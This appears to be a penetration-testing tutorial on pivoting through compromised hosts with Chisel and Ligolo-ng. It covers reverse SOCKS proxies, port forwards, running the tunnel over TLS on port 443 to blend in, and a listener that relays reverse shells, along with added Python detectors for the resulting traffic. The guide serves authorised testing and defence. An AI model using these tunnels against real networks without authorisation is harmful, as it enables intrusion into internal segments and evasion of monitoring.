
Chisel and Ligolo-ng: Tunneling Guide for Pentests

Master Chisel and Ligolo-ng for network pivoting in penetration tests. Set up reverse proxies, SOCKS tunnels, and pivot through restricted networks.


Chisel and Ligolo-ng: Network Tunneling for Penetration Testers

Network pivoting — routing your attack traffic through a compromised host to reach otherwise unreachable internal segments — is one of the most important skills in advanced penetration testing. Two tools dominate modern pivoting: Chisel, a fast TCP/UDP tunnel over HTTP, and Ligolo-ng, a professional-grade tunneling solution that creates a kernel-level network interface for seamless pivoting. This guide covers both, so you can choose the right tool for each engagement.

Legal notice: Only perform these techniques on networks you own or have explicit written authorization to test.

Understanding Pivoting

In a typical pentest, you compromise a host (the pivot or jump host) that sits at a network boundary. That host has access to an internal segment your attacker machine cannot reach directly. Tunneling tools let you forward your traffic through the pivot so your tools can reach the internal network transparently.

Attacker → Internet → [Pivot Host] → Internal Network (10.10.10.0/24)

Part 1: Chisel

Chisel is a single-binary tool written in Go. It runs over HTTP/HTTPS (the tunnel is carried inside a WebSocket), which makes it firewall-friendly. The same binary runs in server mode on your attacker machine and in client mode on the pivot.

Installation

# Download from GitHub releases
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz
gunzip chisel_1.9.1_linux_amd64.gz
mv chisel_1.9.1_linux_amd64 chisel
chmod +x chisel

# Windows client (for Windows pivots)
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz

SOCKS5 Reverse Proxy (Most Common)

On your attacker machine (server mode):

./chisel server --port 8080 --reverse --socks5
  • --reverse allows clients to expose ports back to the server
  • --socks5 enables a SOCKS5 proxy endpoint
  • --port 8080 runs the HTTP server on port 8080 (blend into web traffic)

On the pivot host (client mode):

./chisel client 10.10.14.5:8080 R:socks

R:socks tells the server to open a SOCKS5 proxy on port 1080 (default) that routes through this client connection.

Configure proxychains on attacker machine:

# /etc/proxychains4.conf — add at the end of the [ProxyList] section.
# Comment out the default "socks4 127.0.0.1 9050" Tor entry if it is still active,
# otherwise proxychains tries the wrong proxy first.
socks5 127.0.0.1 1080

Now prefix any command with proxychains to route it through the pivot. A SOCKS proxy only carries complete TCP connections, so Nmap must use a full-connect scan (-sT) and skip its raw-packet host discovery (-Pn):

proxychains nmap -sT -Pn -p 22,80,443,3389 10.10.10.50   # TCP connect scan only; SYN/UDP scans cannot traverse SOCKS
proxychains curl http://10.10.10.50/
proxychains ssh user@10.10.10.50

Forward Port Tunneling

Forward a specific port from the pivot’s internal network to your local machine (from Chisel's point of view this is still a reverse forward, hence the R: prefix):

Client (on pivot):

# Expose the internal RDP host at 10.10.10.20:3389 as localhost:13389 on attacker
./chisel client 10.10.14.5:8080 R:13389:10.10.10.20:3389

Now connect: rdesktop 127.0.0.1:13389

Local Port Forward

If you need the opposite direction — expose a local attacker port to the pivot:

# Make attacker's port 80 accessible from the pivot at localhost:8000
./chisel client 10.10.14.5:8080 8000:127.0.0.1:80

Running Chisel Over HTTPS

Use a self-signed certificate to encrypt the tunnel:

# Generate cert
openssl req -x509 -nodes -newkey rsa:2048 \
  -keyout server.key -out server.crt -days 365 -subj "/CN=chisel"

# Server with TLS
./chisel server --port 443 --reverse --socks5 \
  --tls-cert server.crt --tls-key server.key

# Client connecting over TLS
./chisel client --tls-skip-verify https://10.10.14.5:443 R:socks

Running on port 443 with TLS makes Chisel traffic look like ordinary HTTPS at the network level, because the WebSocket handshake is now inside the encrypted session. It is not invisible, though: a self-signed certificate with CN=chisel (as generated above) stands out to any TLS-inspecting proxy, and where the HTTP is visible the handshake itself identifies the tool.
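The detection side of the same handshake, as an added example that is not part of the original guide or of the Chisel project: a Chisel client opens a WebSocket and asks for the subprotocol chisel-v3 in the Sec-WebSocket-Protocol header, so whenever the HTTP is visible (plain HTTP on port 8080, or HTTPS after TLS termination or inspection) that header is the simplest wire indicator. The request strings below are constructed samples, not captures; the `flag_chisel_requests` helper and its name are mine.

```python
"""Flag Chisel WebSocket handshakes in captured HTTP requests.

Added example, not part of the original guide. Chisel clients request the
WebSocket subprotocol "chisel-v3"; matching the "chisel-v" prefix keeps the
check working if the protocol version is bumped.
"""
from typing import Dict, List

CHISEL_SUBPROTOCOL_PREFIX = "chisel-v"


def parse_request_headers(raw: str) -> Dict[str, str]:
    """Parse one HTTP/1.1 request's header block into a lower-cased dict."""
    lines = raw.strip().splitlines()
    headers: Dict[str, str] = {}
    for line in lines[1:]:            # lines[0] is the request line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def is_chisel_handshake(raw: str) -> bool:
    """True if the request is a WebSocket upgrade offering a chisel-v* subprotocol."""
    h = parse_request_headers(raw)
    if h.get("upgrade", "").lower() != "websocket":
        return False
    offered = [p.strip().lower() for p in h.get("sec-websocket-protocol", "").split(",")]
    return any(p.startswith(CHISEL_SUBPROTOCOL_PREFIX) for p in offered)


def flag_chisel_requests(requests: List[str]) -> List[int]:
    """Return the indices of requests that look like Chisel handshakes."""
    return [i for i, r in enumerate(requests) if is_chisel_handshake(r)]


# Constructed sample requests (not real captures). Request 0 is the shape of
# what a Chisel client sends to `chisel server --port 8080`; request 1 is a
# legitimate application WebSocket; request 2 is an ordinary page fetch.
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\n"
    "Host: 10.10.14.5:8080\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "Sec-WebSocket-Protocol: chisel-v3\r\n\r\n",
    "GET /graphql HTTP/1.1\r\n"
    "Host: app.example.internal\r\n"
    "Upgrade: websocket\r\n"
    "Connection: Upgrade\r\n"
    "Sec-WebSocket-Key: x3JJHMbDL1EzLkh9GBhXDw==\r\n"
    "Sec-WebSocket-Version: 13\r\n"
    "Sec-WebSocket-Protocol: graphql-transport-ws\r\n\r\n",
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.internal\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    for i in flag_chisel_requests(SAMPLE_REQUESTS):
        print(f"request {i}: Chisel tunnel handshake")
```

The check is deliberately header-based rather than port-based: the guide moves the server between 8080 and 443, and the subprotocol string travels with the client regardless of port. For the TLS variant, the same logic applies only at a point where the session is decrypted; otherwise the certificate subject and the long-lived single WebSocket connection are what remain observable.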


Part 2: Ligolo-ng

Ligolo-ng is a next-generation tunneling tool that creates a virtual network interface (tun) on the attacker machine. Instead of relying on proxychains, which only intercepts libc connect() calls and therefore cannot handle UDP, ICMP or statically linked tools, Ligolo-ng routes whole IP packets through the tunnel — your tools connect directly as if the internal network were local.

Architecture

  • proxy — runs on your attacker machine, manages the TUN interface
  • agent — runs on the pivot host, connects back to the proxy

Installation

# Download both binaries from GitHub
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/proxy_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/agent_linux_amd64.tar.gz

tar xzf proxy_linux_amd64.tar.gz
tar xzf agent_linux_amd64.tar.gz

Setup: TUN Interface

# Create the tun interface (once per boot)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up

Start the Proxy (Attacker Machine)

sudo ./proxy -selfcert -laddr 0.0.0.0:11601
  • -selfcert generates a temporary certificate automatically
  • -laddr is the listening address for agent connections

You will see the Ligolo-ng interactive console.

Connect the Agent (Pivot Host)

Transfer the agent binary to the pivot, then:

./agent -connect 10.10.14.5:11601 -ignore-cert

On Windows pivots:

.\agent.exe -connect 10.10.14.5:11601 -ignore-cert

Create the Tunnel Session

Back in the Ligolo-ng proxy console:

ligolo-ng » session
# Select the connected agent session (number shown in list)
[Agent: pivot-host] » start

Add a Route to the Internal Network

# In a new terminal on your attacker machine
sudo ip route add 10.10.10.0/24 dev ligolo

Now all traffic destined for 10.10.10.0/24 is routed through Ligolo-ng — no proxychains needed:

nmap -sV -p- 10.10.10.50          # Full scan, direct
curl http://10.10.10.50/           # HTTP, direct
ssh user@10.10.10.50               # SSH, direct
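A defender's view of the same traffic, as an added example that is not part of the original guide or of Ligolo-ng: every connection tunneled through the agent (the same holds for a Chisel client) enters the segment from the pivot host's own internal IP, so the full port scan above looks, from inside 10.10.10.0/24, like one host opening connections to many (destination, port) pairs within seconds. The function below runs a sliding-window fan-out check over connection records; the records are constructed, and the `Conn` fields are the ones you would pull from Zeek conn.log, NetFlow or firewall logs.

```python
"""Fan-out detection for connections sourced from a pivot host.

Added example, not part of the original guide. Tunneled traffic leaves the
pivot with the pivot's own IP as source, so a scan through the tunnel shows
up inside the segment as one source touching many targets in a short window.
"""
from collections import defaultdict, deque
from dataclasses import dataclass
from typing import Deque, Dict, Iterable, Tuple


@dataclass(frozen=True)
class Conn:
    ts: float      # seconds since capture start (or epoch)
    src: str
    dst: str
    dport: int


def fan_out_alerts(conns: Iterable[Conn], window: float = 60.0,
                   threshold: int = 20) -> Dict[str, int]:
    """Return {src: peak distinct (dst, dport) targets within any `window` seconds}
    for every source whose peak reaches `threshold`."""
    by_src: Dict[str, list] = defaultdict(list)
    for c in sorted(conns, key=lambda c: c.ts):
        by_src[c.src].append(c)

    alerts: Dict[str, int] = {}
    for src, events in by_src.items():
        live: Deque[Conn] = deque()                            # connections inside the window
        active: Dict[Tuple[str, int], int] = defaultdict(int)  # target -> count inside the window
        peak = 0
        for c in events:
            live.append(c)
            active[(c.dst, c.dport)] += 1
            # Slide the window: evict connections older than `window` seconds.
            while live and c.ts - live[0].ts > window:
                old = live.popleft()
                key = (old.dst, old.dport)
                active[key] -= 1
                if active[key] == 0:
                    del active[key]
            peak = max(peak, len(active))
        if peak >= threshold:
            alerts[src] = peak
    return alerts


# Constructed records. 10.10.10.31 is a workstation doing normal file-share and
# intranet access over an hour; 10.10.10.5 is the pivot host, through which the
# attacker's nmap sweeps 25 common ports on 10.10.10.50 in about five seconds.
SWEPT_PORTS = [21, 22, 23, 25, 53, 80, 110, 135, 139, 143, 443, 445, 993, 995,
               1433, 1521, 3306, 3389, 5432, 5900, 5985, 8080, 8443, 9090, 27017]
SAMPLE_CONNS = [
    Conn(0.0, "10.10.10.31", "10.10.10.10", 445),
    Conn(1800.0, "10.10.10.31", "10.10.10.10", 445),
    Conn(3500.0, "10.10.10.31", "10.10.10.12", 80),
] + [
    Conn(100.0 + i * 0.2, "10.10.10.5", "10.10.10.50", port)
    for i, port in enumerate(SWEPT_PORTS)
]

if __name__ == "__main__":
    for src, peak in fan_out_alerts(SAMPLE_CONNS).items():
        print(f"ALERT {src}: {peak} distinct targets inside one {60.0:.0f}s window")
```

Tune `window` and `threshold` to the segment's baseline; a jump host or monitoring server legitimately fans out and needs an allow-list, while a workstation that suddenly reaches 20 distinct ports in a minute is the signature a pivot leaves regardless of which tunnel carried it.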

Pivoting Through Multiple Hops

If a host you control inside the first internal network can reach a second segment (172.16.0.0/24), run a second agent on that host:

# On the second pivot (reached via the first pivot's tunnel)
./agent -connect 10.10.14.5:11601 -ignore-cert

Add another route:

sudo ip route add 172.16.0.0/24 dev ligolo

Select the second session in the Ligolo-ng console and start it. You now have transparent access to a second network segment. Note that the second agent must be able to reach the proxy address it connects to; if the second pivot has no direct path to 10.10.14.5, its connection has to be relayed through a listener on the first agent (see the Listener section below).
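What the two `ip route add` commands actually do on the attacker machine is longest-prefix-match routing, shown here as an added example that is not part of the original guide or of Ligolo-ng. The model below uses Python's ipaddress module to rebuild a small routing table and answer, for a destination, which interface the kernel would pick: the default route before any tunnel route exists, and `ligolo` for both internal segments afterwards. Interface names other than `ligolo`, and the 10.10.14.0/24 VPN route, are assumptions for the example.

```python
"""Longest-prefix-match routing, as the kernel applies it to `ip route add`.

Added example, not part of the original guide. Models a routing table to show
which interface a destination leaves through, and why nothing reaches
10.10.10.0/24 via the tunnel until the route exists.
"""
import ipaddress
from typing import Dict, List, Tuple

Route = Tuple[ipaddress.IPv4Network, str]


def build_table(entries: List[Tuple[str, str]]) -> List[Route]:
    """Turn (cidr, device) pairs into a table ordered longest prefix first."""
    table = [(ipaddress.ip_network(cidr, strict=False), dev) for cidr, dev in entries]
    table.sort(key=lambda r: r[0].prefixlen, reverse=True)
    return table


def lookup(table: List[Route], dst: str) -> str:
    """Return the device for dst: the most specific route containing it wins."""
    addr = ipaddress.ip_address(dst)
    for net, dev in table:
        if addr in net:
            return dev
    raise LookupError(f"no route to {dst}")


def classify(table: List[Route], dsts: List[str]) -> Dict[str, str]:
    """Map each destination to the device it would leave through."""
    return {d: lookup(table, d) for d in dsts}


# Constructed tables. UPLINK_ONLY is the attacker box before any tunnel route;
# WITH_TUNNEL adds the two routes from the guide. "eth0" and "tun0" are assumed
# interface names; "ligolo" is the interface created in the Setup section.
UPLINK_ONLY = build_table([
    ("0.0.0.0/0", "eth0"),        # default route, normal uplink
    ("10.10.14.0/24", "tun0"),    # the lab VPN the attacker sits on (assumed)
])
WITH_TUNNEL = build_table([
    ("0.0.0.0/0", "eth0"),
    ("10.10.14.0/24", "tun0"),
    ("10.10.10.0/24", "ligolo"),  # sudo ip route add 10.10.10.0/24 dev ligolo
    ("172.16.0.0/24", "ligolo"),  # sudo ip route add 172.16.0.0/24 dev ligolo
])

if __name__ == "__main__":
    for dst in ["10.10.10.50", "172.16.0.20", "10.10.14.5", "8.8.8.8"]:
        print(f"{dst:>12}: {lookup(UPLINK_ONLY, dst):>6} -> {lookup(WITH_TUNNEL, dst)}")
```

The ordering step is the whole point: a /24 tunnel route beats the /0 default, and a more specific route would beat the tunnel in turn. It is also the caveat to keep in mind when an internal segment overlaps an address range you already use (for example the VPN your own machine sits on): a tunnel route of the same prefix length competes with the existing one, so check with `ip route get <address>` before trusting where the traffic goes.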

Listener (Reverse Connections from Internal Hosts)

If you need the internal network to reach your attacker machine (e.g., for catching reverse shells):

[Agent: pivot-host] » listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444

This forwards connections on the pivot’s port 4444 back to your local listener on 4444.


Chisel vs. Ligolo-ng: Quick Comparison

Feature            | Chisel             | Ligolo-ng
-------------------|--------------------|-----------------------------
Protocol           | HTTP/HTTPS         | TLS (custom)
Proxy type         | SOCKS5             | TUN interface (full IP)
UDP support        | No                 | Yes
Multi-hop          | Manual chaining    | Native sessions
Tool compatibility | Needs proxychains  | Transparent (no proxychains)
Complexity         | Low                | Medium
Binary size        | ~8 MB              | ~12 MB

Use Chisel when you need quick SOCKS proxying with minimal setup or when the pivot’s egress only allows HTTP.

Use Ligolo-ng when you need full transparent routing, UDP support, or are running tools that do not work well through proxychains (e.g., Impacket scripts, Nmap UDP scans).

Summary

Pivoting is a critical skill for penetration testers working in segmented enterprise environments. Chisel excels at quick HTTP-based SOCKS tunnels, while Ligolo-ng provides a superior transparent routing experience via a kernel TUN interface. Mastering both gives you flexibility to handle any network topology you encounter during an authorized engagement.

#penetration-testing #pivoting #tunneling #ligolo-ng #chisel